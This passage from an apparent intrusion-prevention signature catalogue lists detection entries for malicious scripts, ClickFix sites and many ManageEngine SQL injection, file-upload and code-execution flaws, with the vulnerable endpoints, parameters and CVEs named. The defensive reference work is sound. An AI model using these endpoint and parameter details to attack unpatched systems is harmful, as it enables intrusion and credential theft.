Description:	Malicious KiXtart script infection traffic was detected. This type of script has been observed downloading MirrorBlast malware.
Situation:	HTTP_CSU-Malicious-KiXtart-Script-Infection-Traffic

Malicious-Obfuscation-JavaScript-VBScript-HTML

About this vulnerability:	Malicious obfuscated JavaScript and VBScript in HTML page detected
Risk:	High
First detected in:	sgpkg-ips-1371-5242
Last changed:	sgpkg-ips-1423-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	Malicious obfuscated JavaScript and VBScript in HTML page (leading to download of malicious payload) was detected.
Situation:	File-Text_Malicious-Obfuscated-JavaScript-VBScript-Detected

Malicious-Obfuscation-Reversed-PowerShell

About this vulnerability:	Malicious obfuscated script with reversed PowerShell keywords detected
Risk:	High
First detected in:	sgpkg-ips-1375-5242
Last changed:	sgpkg-ips-1423-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	Malicious obfuscated script containing reversed PowerShell keywords was detected.
Situation:	File-Text_Malicious-Obfuscated-Reversed-PowerShell-Detected

Malicious-Site-Using-ClickFix-Technique

About this vulnerability:	A malicious ClickFix website detected
Risk:	High
First detected in:	sgpkg-ips-1846-5242
Last changed:	sgpkg-ips-1846-5242
Platform:	Generic
Software:	Any Software
Type:	Input Validation
Description:	A malicious site that uses the ClickFix tactic usually shows fake browser alerts that warn the user that the webpage or document cannot be displayed correctly by the browser until they click the "Fix It" button and follow the outlined steps. This results in the user unknowningly copying and executing malicious code that installs malware. This fingerprint detects such malicious sites.
Situation:	File-Text_Information-Stealer-Using-Fake-Browser-Dialogs

Malicious-VBScript-Execution

About this vulnerability:	Malicious VBScript detected
Risk:	High
First detected in:	sgpkg-ips-1089-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Malicious VBScript has been detected. Malicious VBScript files are usually used as downloaders for a final malware.
Situation:	Shared_Malicious-VBScript-Execution File-Text_Malicious-VBScript-Execution File-Text_Obfuscated-VBScript-Inside-JavaScript

Malicious_Download_Redirect

About this vulnerability:	Malicious redirection was detected
Risk:	High
First detected in:	sgpkg-ips-1377-5242
Last changed:	sgpkg-ips-1377-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	A malicious redirection was detected. Malicious redirections usually originate from legitimate web sites that are compromised.
Situation:	File-Text_Malicious_Download_Redirect

Malicious_Redirection_Detected

About this vulnerability:	Malicious redirection was detected
Risk:	High
First detected in:	sgpkg-ips-1232-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	A malicious redirection was detected. Malicious redirections usually originate from legitimate web sites that are compromised.
Situation:	File-Text_Malicious_Redirection_Detected File-Text_Malicious_Redirection_Detected-5 File-Text_Malicious_Redirection_Detected-4 File-Text_Malicious_Redirection_Detected-3 File-Text_Malicious_Redirection_Detected-2

Maltrail-Unauthenticated-Command-Injection

About this vulnerability:	An attempt to exploit a vulnerability in Maltrail detected
Risk:	High
First detected in:	sgpkg-ips-1669-5242
Last changed:	sgpkg-ips-1669-5242
Platform:	Unix;Linux
Software:	Maltrail
Type:	Input Validation
Description:	A vulnerability in Maltrail, versions before 0.54, which allows remote attackers to execute arbitrary code through the username parameter, due to insufficient input validation.
Situation:	HTTP_CRL-Maltrail-Unauthenticated-Command-Injection

Malwarebytes-Anti-Malware-URI-Handler-Remote-Code-Execution

About this vulnerability:

A vulnerability in Malwarebytes Anti-Malware

Risk:

Moderate

First detected in:

sgpkg-ips-1156-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Malwarebytes Anti-Malware

Type:

Input Validation

Description:

There has been reported a remote code execution in Malwarebytes Anti-Malware. Exploitation of this vulnerability requires opening a malicious web page. Successful exploitation leads in arbitrary code execution.

Situation:

HTTP_SHS-Malwarebytes-Anti-Malware-URI-Handler-Remote-Code-Execution
File-Text_Malwarebytes-Anti-Malware-URI-Handler-Remote-Code-Execution

References:

CVE-2019-6739
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6739

Mambo-Globals-Php-MosConfig-Live-Site-Compromise

About this vulnerability:	Mambo Globals.php mosConfig_live_site variable command execution vulnerability
Risk:	Moderate
First detected in:	sgpkg-ips-130-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Mambo Site Server; Joomla
Type:	Malfunction
Description:	There are several remote command execution vulnerabilities in various versions of Mambo Site Server, Joomla and third party extensions of them. These vulnerabilities are due to insufficient input validation of mosConfig_live_site global variable, which may allow code execution from a remote location.
Situation:	HTTP_CSU-Mambo-Globals-Php-MosConfig-Live-Site-Compromise

Manage-Engine-Exchange-Reporter-Plus-Unauthenticated-RCE

About this vulnerability:	A vulnerability in Manage Engine Exchange Reporter Plus
Risk:	High
First detected in:	sgpkg-ips-1117-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ManageEngine Exchange Reporter Plus
Type:	Code Injection
Description:	A vulnerability in ManageEngine Exchange Reporter Plus, versions 5310 and before, which allows remote attackers to execute arbitrary code through the execution of bcp.exe inside the ADSHACluster servlet.
Situation:	HTTP_CRL-Manage-Engine-Exchange-Reporter-Plus-Unauthenticated-RCE

Manageengine-Adselfservice-Plus-Custom-Script-Execution

About this vulnerability:

A vulnerability in ManageEngine ADSelfService Plus.

Risk:

High

First detected in:

sgpkg-ips-1461-5242

Last changed:

sgpkg-ips-1461-5242

Platform:

Windows

Software:

Zoho Corporation ManageEngine ADSelfService Plus

Type:

Insecure Configuration

Description:

A vulnerability in Zoho Corporation ManageEngine ADSelfServicePlus, build prior to 6122, which allows remote attackers to execute arbitrary commands via the "custom script" feature.

Situation:

HTTP_CS-Manageengine-Adselfservice-Plus-Custom-Script-Execution

References:

CVE-2022-28810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28810

Manageengine-Applications-Manager-Commonapiutil-Getmglist-Groupid-SQL-Injection

About this vulnerability:	A vulnerability in ManageEngine Applications Manager
Risk:	High
First detected in:	sgpkg-ips-658-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ManageEngine Applications Manager
Type:	Input Validation
Description:	An SQL injection vulnerability exists in ManageEngine Applications Manager. This vulnerability is due to insufficient validation of the groupId parameter when processing requests using the getMGList method of the CommonAPIUtil class. A remote attacker can exploit this vulnerability to inject and execute arbitrary SQL code on the affected system.
Situation:	HTTP_CRL-Manageengine-Applications-Manager-Commonapiutil-Getmglist-Groupid-SQL-Injection

Manageengine-Applications-Manager-Commonapiutil-Movesubgroup-Haid-SQL-Injection

About this vulnerability:	A vulnerability in ManageEngine Applications Manager
Risk:	Moderate
First detected in:	sgpkg-ips-699-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ManageEngine Applications Manager
Type:	Input Validation
Description:	Some requests to the server can be used to inject SQL.
Situation:	HTTP_CSU-Manageengine-Applications-Manager-Commonapiutil-Movesubgroup-Haid-Tohaid-SQL-Injection

Manageengine-Applications-Manager-Commonapiutil-Removemonitorfrmmg-SQL-Injection

About this vulnerability:	A vulnerability in ManageEngine Applications Manager
Risk:	Moderate
First detected in:	sgpkg-ips-696-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ManageEngine Applications Manager
Type:	Input Validation
Description:	There is an SQL injection vulnerability in ManageEngine Applications Manager, which can be exploited using a crafted HTTP request.
Situation:	HTTP_CSU-Manageengine-Applications-Manager-Commonapiutil-Removemonitorfrmmg-Haid-SQL-Injection

Manageengine-Applications-Manager-Commonapiutil-SQL-Injection

About this vulnerability:	A vulnerability in ManageEngine Applications Manager
Risk:	High
First detected in:	sgpkg-ips-702-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ManageEngine Applications Manager
Type:	Input Validation
Description:	There exists an SQL injection vulnerability in ManageEngine Application Manager. A remote attacker can use this to inject and execute arbitrary SQL code on the target system.
Situation:	HTTP_CRL-Manageengine-Applications-Manager-Commonapiutil-SQL-Injection

Manageengine-Applications-Manager-Commonapiutil-Syncmonitors-Haid-SQL-Injection

About this vulnerability:	A vulnerability in ManageEngine Applications Manager
Risk:	Moderate
First detected in:	sgpkg-ips-659-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ManageEngine Applications Manager
Type:	Input Validation
Description:	An SQL injection vulnerability exists in ManageEngine Applications Manager. This vulnerability is due to insufficient validation of the haid parameter when processing requests using the SyncMonitors method of the CommonAPIUtil class. A remote attacker can exploit this vulnerability to inject and execute arbitrary SQL code on the affected system.
Situation:	HTTP_CSU-Manageengine-Applications-Manager-Commonapiutil-Syncmonitors-Haid-SQL-Injection

Manageengine-Applications-Manager-Menuhandlerservlet-SQL-Injection

About this vulnerability:

A vulnerability in ManageEngine Applications Manager

Risk:

Moderate

First detected in:

sgpkg-ips-880-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine Applications Manager

Type:

Input Validation

Description:

Insufficient validation of the config_id parameter in requests causes an SQL injection vulnerability in ManageEngine Applications Manager. A successful exploitation allows an attacker to execute arbitrary SQL statements with full privileges.

Situation:

HTTP_CRL-Manageengine-Applications-Manager-Menuhandlerservlet-SQL-Injection

References:

CVE-2016-9488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9488

Manageengine-Applications-Manager-Remote-Code-Execution

About this vulnerability:

A ManageEngine Applications Manager Remote Code Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-1071-5242

Last changed:

sgpkg-ips-1731-5242

Platform:

Windows

Software:

ManageEngine Applications Manager

Type:

Input Validation

Description:

A vulnerability in ManageEngine Applications Manager, versions before 13.6 (build 13640), which allows remote attackers to execute arbitrary code via the testCredential.do endpoint, due to the lack of username/password validation.

Situation:

HTTP_CRL-Zoho-Manageengine-ApplicationManager-TestCredential.do-Command-Injection

References:

CVE-2018-7890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7890

Manageengine-Desktop-Central-Dcpluginservelet-Policy-Bypass

About this vulnerability:

A vulnerability in ManageEngine DesktopCentral

Risk:

Moderate

First detected in:

sgpkg-ips-623-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine DesktopCentral

Type:

Malfunction

Description:

A policy bypass vulnerability exists in ManageEngine Desktop Central. The vulnerability is due to lack of authentication and insufficient input validation of the parameters sent to the Dcpluginservelet page when processing HTTP(S) requests. A remote unauthenticated attacker can exploit this vulnerability by sending an specially crafted request to the target server. In a successful attack scenario, the attacker can create an administrator account.

Situation:

HTTP_CRL-Manageengine-Desktop-Central-Dcpluginservelet-Policy-Bypass

References:

CVE-2014-7862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7862

OSVDB-116554
http://www.osvdb.org/116554

Manageengine-Desktop-Central-Java-Deserialization

About this vulnerability:

A vulnerability in ManageEngine Desktop Central

Risk:

High

First detected in:

sgpkg-ips-1237-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Zoho Corporation ManageEngine Desktop Central

Type:

Input Validation

Description:

There exists a vulnerability in ManageEngine Desktop Central, versions before 10.0.474, which allows remote attackers to execute arbitrary code, due to the lack of user input validation in the getChartImage() method from the FileStorage class.

Situation:

HTTP_CRL-Manageengine-Desktop-Central-Java-Deserialization

References:

CVE-2020-10189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189

Manageengine-Desktop-Central-mdmLogUploader-Directory-Traversal

About this vulnerability:

A vulnerability in ManageEngine DesktopCentral

Risk:

High

First detected in:

sgpkg-ips-669-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine DesktopCentral

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in ManageEngine Desktop Central. The vulnerability is due to lack of authentication and insufficient input validation in the mdmLogUploader when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.

Situation:

HTTP_CRL-Manageengine-Desktop-Central-mdmLogUploader-Directory-Traversal

References:

CVE-2014-5006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5006

BID-69493
http://www.securityfocus.com/bid/69493

OSVDB-110644
http://www.osvdb.org/110644

Manageengine-Desktop-Central-Msp-Fileuploadservlet-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in ManageEngine DesktopCentral

Risk:

Moderate

First detected in:

sgpkg-ips-648-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

ManageEngine DesktopCentral

Type:

Malfunction

Description:

An arbitrary file upload vulnerability exists in ManageEngine Desktop Central and Desktop Central MSP. The vulnerability is due to a failure to sanitize filenames uploaded to FileUploadServlet servlet. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation could lead to arbitrary code execution under the security context of the SYSTEM user.

Situation:

HTTP_CRL-Manageengine-Desktop-Central-Msp-Fileuploadservlet-Arbitrary-File-Upload

References:

CVE-2015-8249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8249

OSVDB-121816
http://www.osvdb.org/121816

Manageengine-Desktop-Central-Statusupdate-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in ManageEngine DesktopCentral

Risk:

Moderate

First detected in:

sgpkg-ips-631-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

ManageEngine DesktopCentral

Type:

Directory Traversal

Description:

An arbitrary file upload vulnerability exists in ManageEngine Desktop Central. The vulnerability is due to lack of authentication and insufficient input validation of the parameters sent to the StatusUpdate page when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.

Situation:

HTTP_CRL-Manageengine-Desktop-Central-Statusupdate-Arbitrary-File-Upload

References:

CVE-2014-5005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5005

BID-69494
http://www.securityfocus.com/bid/69494

OSVDB-110643
http://www.osvdb.org/110643

Manageengine-Desktop-Central-Statusupdateservlet-Filename-Directory-Traversal

About this vulnerability:

A vulnerability in ManageEngine DesktopCentral

Risk:

Moderate

First detected in:

sgpkg-ips-625-5211

Last changed:

sgpkg-ips-1453-5242

Platform:

Generic

Software:

ManageEngine DesktopCentral

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in ManageEngine Desktop Central MSP. The vulnerability is due to lack of authentication and insufficient input validation of the filename parameter sent to the StatusUpdateServlet page when processing HTTP(S) requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation could lead to arbitrary code execution under the security context of the system user.

Situation:

HTTP_CRL-Manageengine-Desktop-Central-Msp-Statusupdateservlet-Filename-Directory-Traversal

References:

CVE-2014-9404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9404

OSVDB-116802
http://www.osvdb.org/116802

Manageengine-Desktop-Central-Unauthorized-Administrative-Password-Reset

About this vulnerability:

A vulnerability in ManageEngine Desktop Central

Risk:

Moderate

First detected in:

sgpkg-ips-637-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine DesktopCentral

Type:

Malfunction

Description:

An access control weakness vulnerability exists in ManageEngine Desktop Central. The vulnerability is due to design error in limiting the admin's password reset functionality to authorized admin users only. This allows any remote unauthenticated users to access the administrative control panel of Desktop Central. A remote unauthenticated user can exploit this vulnerability to modify administrator's credential on Desktop Central.

Situation:

HTTP_CRL-Manageengine-Desktop-Central-Unauthorized-Administrative-Password-Reset

References:

CVE-2015-2560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2560

OSVDB-120026
http://www.osvdb.org/120026

Manageengine-Desktopcentral-Agentlogupload-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in ManageEngine DesktopCentral

Risk:

Moderate

First detected in:

sgpkg-ips-554-5211

Last changed:

sgpkg-ips-1732-5242

Platform:

Generic

Software:

ManageEngine DesktopCentral

Type:

Malfunction

Description:

A code execution vulnerability has been reported in ManageEngine DesktopCentral. The vulnerability is due to lack of authentication and insufficient input validation in the AgentLogUploadServlet.class when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.

Situation:

HTTP_CSU-Manageengine-Desktopcentral-Agentlogupload-Arbitrary-File-Upload

References:

CVE-2013-7390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7390

BID-63784
http://www.securityfocus.com/bid/63784

OSVDB-100008
http://www.osvdb.org/100008

Manageengine-Desktopcentral-SQL-Injection

About this vulnerability:

A ManageEngine DesktopCentral SQL Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-765-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine DesktopCentral

Type:

SQL Injection

Description:

A vulnerability in ManageEngine Desktop Central v7 build 70200 to v9 build 90033, and Password Manager Pro v6 build 6500 to v7 build 7002, which allows remote attackers to execute arbitrary SQL commands via the sv parameter to LinkViewFetchServlet.dat, possibly allowing the execution of remote code as SYSTEM in Windows or as the user in Linux.

Situation:

HTTP_CSU-Manageengine-Desktopcentral-SQL-Injection

References:

CVE-2014-3996
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3996

BID-69305
http://www.securityfocus.com/bid/69305

OSVDB-110198
http://www.osvdb.org/110198

Manageengine-DeviceExpert-User-Credentials-Disclosure

About this vulnerability:

A Manageengine DeviceExpert User Credentials Disclosure Vulnerability.

Risk:

High

First detected in:

sgpkg-ips-696-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine DeviceExpert

Type:

Insecure Configuration

Description:

A vulnerability in ManageEngine DeviceExpert, versions before 5.9 build 5981, which allow remote attackers to directly request user credential information.

Situation:

HTTP_CSU-Manageengine-DeviceExpert-User-Credentials-Disclosure

References:

CVE-2014-5377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5377

BID-69443
http://www.securityfocus.com/bid/69443

Manageengine-EventLog-Analyzer-Agenthandler-Information-Disclosure

About this vulnerability:

A vulnerability in ManageEngine EventLog Analyzer

Risk:

Moderate

First detected in:

sgpkg-ips-617-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

ManageEngine EventLog Analyzer

Type:

Input Validation

Description:

An information disclosure vulnerability exists in ManageEngine EventLog Analyzer. The vulnerability is due to a failure to restrict access to confidential data and an input validation error in the agentHandler servlet. A remote unauthenticated attacker can exploit the vulnerability to disclose administrator credentials and SQL database data.

Situation:

HTTP_CRL-Manageengine-EventLog-Analyzer-Agenthandler-Information-Disclosure

References:

CVE-2014-6038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6038

BID-70959
http://www.securityfocus.com/bid/70959

OSVDB-114342
http://www.osvdb.org/114342

Manageengine-EventLog-Analyzer-Agentupload-Directory-Traversal

About this vulnerability:

A vulnerability in ManageEngine EventLog Analyzer

Risk:

Moderate

First detected in:

sgpkg-ips-607-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine EventLog Analyzer

Type:

Directory Traversal

Description:

A code execution vulnerability has been reported in ManageEngine EventLog Analyzer. The vulnerability is due to lack of authentication and insufficient input validation in agentUpload when processing zip files. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.

Situation:

HTTP_CS-Manageengine-EventLog-Analyzer-Agentupload-Directory-Traversal

References:

CVE-2014-6037
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6037

BID-69482
http://www.securityfocus.com/bid/69482

OSVDB-110642
http://www.osvdb.org/110642

Manageengine-EventLog-Analyzer-Cross-Site-Request-Forgery

About this vulnerability:

A vulnerability in ManageEngine EventLog Analyzer

Risk:

Moderate

First detected in:

sgpkg-ips-649-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

ManageEngine EventLog Analyzer

Type:

Input Validation

Description:

A cross site request forgery vulnerability exists in ManageEngine EventLog Analyzer. The vulnerability is due to insufficient input validation of parameters sent to event/userManagementForm.do. By convincing a user to follow a malicious link, a remote attacker can exploit this vulnerability to conduct a cross-site request forgery (CSRF) attack on the affected system. A successful exploit could allow the attacker to submit arbitrary requests to the affected system via the web browser with the privileges of the user.

Situation:

HTTP_CSH-Manageengine-EventLog-Analyzer-Cross-Site-Request-Forgery

References:

BID-74743
http://www.securityfocus.com/bid/74743

Manageengine-EventLog-Analyzer-Hostdetails-Information-Disclosure

About this vulnerability:

A vulnerability in ManageEngine EventLog Analyzer

Risk:

Moderate

First detected in:

sgpkg-ips-619-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine EventLog Analyzer

Type:

Malfunction

Description:

An information disclosure vulnerability exists in ManageEngine EventLog Analyzer. The vulnerability is due to a failure to restrict access to confidential data in the HostDataServlet servlet. A remote unauthenticated attacker can exploit the vulnerability to disclose administrator credentials.

Situation:

HTTP_CSU-Manageengine-EventLog-Analyzer-Hostdetails-Information-Disclosure

References:

CVE-2014-6039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6039

BID-70960
http://www.securityfocus.com/bid/70960

OSVDB-114344
http://www.osvdb.org/114344

Manageengine-EventLog-Analyzer-runQuery-Guest-User-SQL-Injection

About this vulnerability:

A vulnerability in ManageEngine EventLog Analyzer

Risk:

High

First detected in:

sgpkg-ips-704-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

ManageEngine EventLog Analyzer

Type:

Malfunction

Description:

There exists an SQL injection vulnerability in ManageEngine EventLog Analyzer. A remote attacker can use this to execute arbitrary SQL code with SYSTEM privileges.

Situation:

HTTP_CRL-Manageengine-EventLog-Analyzer-runQuery-Guest-User-SQL-Injection

References:

CVE-2015-7387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7387

Manageengine-Firewall-Analyzer-runQuery-Guest-User-SQL-Injection

About this vulnerability:	A vulnerability in ManageEngine Firewall Analyzer
Risk:	Moderate
First detected in:	sgpkg-ips-748-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ManageEngine Firewall Analyzer
Type:	Input Validation
Description:	There exists an SQL injection vulnerability in ManageEngine Firewall Analyzer. A remote attacker can use this to execute arbitrary SQL code with SYSTEM privileges.
Situation:	HTTP_CRL-Manageengine-Firewall-Analyzer-runQuery-Guest-User-SQL-Injection

Manageengine-Multiple-Products-Customername-SQL-Injection-Remote-Code-Execution

About this vulnerability:	A vulnerability in ManageEngine Applications Manager
Risk:	Moderate
First detected in:	sgpkg-ips-666-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ManageEngine Applications Manager; ManageEngine IT360
Type:	Input Validation
Description:	An SQL injection vulnerability exists in ManageEngine Applications Manager and ManageEngine IT360 MSP Edition. This vulnerability is due to insufficient validation of certain parameters when processing requests using customerName via CustomerManagementAPI. A remote attacker can exploit this vulnerability to inject and execute arbitrary SQL code on the affected system.
Situation:	HTTP_CSU-Manageengine-Multiple-Products-Customername-SQL-Injection-Remote-Code-Execution

Manageengine-Multiple-Products-Failoverhelperservlet-Information-Disclosure

About this vulnerability:

A vulnerability in ManageEngine Applications Manager

Risk:

Moderate

First detected in:

sgpkg-ips-630-5211

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

ManageEngine Applications Manager; ManageEngine OpManager

Type:

Input Validation

Description:

An information disclosure vulnerability exists in ManageEngine OpManager, Applications Manager and IT360. The vulnerability is due to lack of authentication and insufficient input validation of the a parameter sent to FailOverHelperServlet in HTTP requests. A remote unauthenticated attacker can leverage this vulnerability by sending malicious HTTP requests the server. Upon successful attack, the attacker can download arbitrary files from arbitrary locations on the server or perform a directory listing to disclose information.

Situation:

HTTP_CRL-Manageengine-Multiple-Products-Failoverhelperservlet-Copyfile-Information-Disclosure
HTTP_CRL-Manageengine-Multiple-Products-Failoverhelperservlet-Listdirectory-Information-Disclosure

References:

CVE-2014-7863
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7863

OSVDB-117695
http://www.osvdb.org/117695

Manageengine-Multiple-Products-File-Attachment-Directory-Traversal

About this vulnerability:

A vulnerability in ManageEngine AssetExplorer

Risk:

High

First detected in:

sgpkg-ips-625-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine AssetExplorer; ManageEngine IT360; ManageEngine ServiceDesk Plus; ManageEngine SupportCenter

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in ManageEngine ServiceDesk Plus, AssetExplorer, SupportCenter and IT360. The vulnerability is due to insufficient input validation of the "module" parameter sent in HTTP requests to the server. A remote authenticated attacker can upload or delete arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.

Situation:

HTTP_CRL-Manageengine-Multiple-Products-File-Attachment-Directory-Traversal

References:

CVE-2014-5301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5301

OSVDB-116733
http://www.osvdb.org/116733

Manageengine-Multiple-Products-Filecollector-Directory-Traversal

About this vulnerability:

A vulnerability in ManageEngine IT360

Risk:

Moderate

First detected in:

sgpkg-ips-609-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine IT360; ManageEngine OpManager; ManageEngine Social IT Plus

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation on parameters sent to "/servlets/FileCollector" in HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.

Situation:

HTTP_CSU-Manageengine-Multiple-Products-Filecollector-Directory-Traversal

References:

CVE-2014-6035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6035

OSVDB-112277
http://www.osvdb.org/112277

Manageengine-Multiple-Products-Filecollector-Dopost-Directory-Traversal

About this vulnerability:

A vulnerability in ManageEngine IT360

Risk:

Moderate

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine IT360; ManageEngine OpManager; ManageEngine Social IT Plus

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation on parameters sent to "/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector" in HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.

Situation:

HTTP_CSU-Manageengine-Multiple-Products-Filecollector-Dopost-Directory-Traversal

References:

CVE-2014-6034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6034

OSVDB-112276
http://www.osvdb.org/112276

Manageengine-Multiple-Products-It360sputil-Resids-SQL-Injection

About this vulnerability:	A vulnerability in ManageEngine Applications Manager
Risk:	Moderate
First detected in:	sgpkg-ips-668-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ManageEngine Applications Manager; ManageEngine IT360
Type:	Input Validation
Description:	An SQL injection vulnerability has been reported in ManageEngine Applications Manager and ManageEngine IT360 MSP Edition. This vulnerability is due to the insufficient validation of user-supplied input when processing requests sent to the It360SPUtil class. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted message to a target server. Successful exploitation will result in injection and execution of arbitrary SQL code on the affected system under the context of SYSTEM.
Situation:	HTTP_CSU-Manageengine-Multiple-Products-It360sputil-Resids-SQL-Injection

Manageengine-Multiple-Products-Wsdiscoveryservlet-Directory-Traversal

About this vulnerability:

A vulnerability in ManageEngine AssetExplorer

Risk:

Moderate

First detected in:

sgpkg-ips-625-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine AssetExplorer; ManageEngine IT360; ManageEngine ServiceDesk Plus

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in ManageEngine ServiceDesk Plus, AssetExplorer and IT360. The vulnerability is due to lack of authentication and insufficient input validation on the "computerName" parameter sent in HTTP requests to the WsDiscoveryServlet. A remote unauthenticated attacker can upload or delete arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing crafted files in critical locations.

Situation:

HTTP_CRL-Manageengine-Multiple-Products-Wsdiscoveryservlet-Directory-Traversal

References:

CVE-2014-5302
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5302

OSVDB-116737
http://www.osvdb.org/116737

Manageengine-NetFlow-Analyzer-And-IT360-Creportpdfservlet-Vulnerability

About this vulnerability:

A vulnerability in ManageEngine IT360 and ManageEngine NetFlow

Risk:

High

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ManageEngine IT360; ManageEngine NetFlow

Type:

Directory Traversal

Description:

An arbitrary file download vulnerability exists in ManageEngine Netflow Analyzer and IT360. The vulnerability is due to lack of authentication and insufficient input validation on the "schFilePath" parameter sent to the CReportPDFServlet in HTTP requests. A remote unauthenticated attacker can download arbitrary files from arbitrary locations on the server by sending malicious requests to it.

Situation:

HTTP_CRL-Manageengine-NetFlow-Analyzer-And-IT360-Creportpdfservlet-Arbitrary-File-Download

References:

CVE-2014-5445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5445

BID-71404
http://www.securityfocus.com/bid/71404

OSVDB-115341
http://www.osvdb.org/115341

